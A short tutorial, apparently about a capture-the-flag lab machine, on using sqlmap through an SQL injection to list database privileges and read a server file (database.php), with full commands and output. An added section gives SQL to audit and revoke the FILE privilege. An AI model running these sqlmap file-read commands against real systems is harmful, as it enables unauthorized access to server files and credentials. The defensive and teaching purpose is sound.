Hi Guys,
Sometimes you find a SQL injection vulnerability on a server and want to leverage it to get more information from that server.
SQLMap can read files from the server when the database account has enough privilege. To check whether you have that privilege, run this command:
sqlmap -r header-req --current-user --privileges
[*] 'hector'@'localhost' (administrator) [29]:
    privilege: ALTER
    privilege: ALTER ROUTINE
    privilege: CREATE
    privilege: CREATE ROUTINE
    privilege: CREATE TABLESPACE
    privilege: CREATE TEMPORARY TABLES
    privilege: CREATE USER
    privilege: CREATE VIEW
    privilege: DELETE
    privilege: DELETE HISTORY
    privilege: DROP
    privilege: EVENT
    privilege: EXECUTE
    privilege: FILE
    privilege: INDEX
    privilege: INSERT
    privilege: LOCK TABLES
    privilege: PROCESS
    privilege: REFERENCES
    privilege: RELOAD
    privilege: REPLICATION CLIENT
    privilege: REPLICATION SLAVE
    privilege: SELECT
    privilege: SHOW DATABASES
    privilege: SHOW VIEW
    privilege: SHUTDOWN
    privilege: SUPER
    privilege: TRIGGER
    privilege: UPDATE
If the output shows the FILE privilege, you can read files on the server, as in the sample below:
sqlmap -r header-req --file-read=C:\\inetpub\\wwwroot\\database.php
[18:31:20] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[18:31:20] [INFO] fingerprinting the back-end DBMS operating system
[18:31:20] [INFO] the back-end DBMS operating system is Windows
[18:31:20] [INFO] fetching file: 'C:/inetpub/wwwroot/database.php'
[18:31:21] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[18:31:28] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[18:31:28] [WARNING] unable to retrieve the content of the file 'C:/inetpub/wwwroot/database.php', going to fall-back to simpler UNION technique
[18:31:28] [INFO] fetching file: 'C:/inetpub/wwwroot/database.php'
do you want confirmation that the remote file 'C:/inetpub/wwwroot/database.php' has been successfully downloaded from the back-end DBMS file system? [Y/n] Y
[18:31:33] [INFO] the local file '/root/.sqlmap/output/10.10.10.167/files/C__inetpub_wwwroot_database.php' and the remote file 'C:/inetpub/wwwroot/database.php' have the same size (904 B)
files saved to [1]:
[*] /root/.sqlmap/output/10.10.10.167/files/C__inetpub_wwwroot_database.php (same file)
[18:31:33] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.10.10.167'
[*] ending @ 18:31:33 /2020-05-25/
You can see that the file database.php at the specified path was downloaded and stored on our machine.
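
From the defender's side, the FILE privilege in the output above is what lets an injected query read files, so it is the grant to audit and remove from a web application's account. The following is an added example, not part of the original post: it assumes DBA access on the MySQL/MariaDB server, reuses the 'hector'@'localhost' account from the output above, and uses a hypothetical application schema named appdb.

```sql
-- Added example: run as a DBA directly on the MySQL/MariaDB server.

-- 1. List every account that holds the global FILE privilege.
--    An account used by a web application should not appear here.
SELECT GRANTEE, PRIVILEGE_TYPE, IS_GRANTABLE
FROM information_schema.USER_PRIVILEGES
WHERE PRIVILEGE_TYPE = 'FILE'
ORDER BY GRANTEE;

-- 2. Check where the server is allowed to read and write files.
--    An empty value means no restriction; a directory limits
--    LOAD_FILE(), LOAD DATA and SELECT ... INTO OUTFILE to that directory.
SHOW VARIABLES LIKE 'secure_file_priv';

-- secure_file_priv is read-only at runtime. Set it in the server
-- configuration file and restart, for example (placeholder path):
--   [mysqld]
--   secure_file_priv = <dedicated-import-directory>

-- 3. Record the account's current grants before changing them.
SHOW GRANTS FOR 'hector'@'localhost';

-- 4. Strip the administrator-level grants (FILE, SUPER, CREATE USER, ...)
--    and give back only what the application needs on its own schema.
--    'appdb' is a hypothetical schema name; the privilege list is an
--    assumption about a typical read/write web application.
REVOKE ALL PRIVILEGES, GRANT OPTION FROM 'hector'@'localhost';
GRANT SELECT, INSERT, UPDATE, DELETE ON appdb.* TO 'hector'@'localhost';

-- 5. Confirm the account no longer holds FILE (expected result: 0).
SELECT COUNT(*) AS still_has_file
FROM information_schema.USER_PRIVILEGES
WHERE GRANTEE = '''hector''@''localhost'''
  AND PRIVILEGE_TYPE = 'FILE';
```

With FILE revoked, the --privileges check shown earlier no longer lists it for this account, and file reads through the injection point depend on a privilege the account does not have.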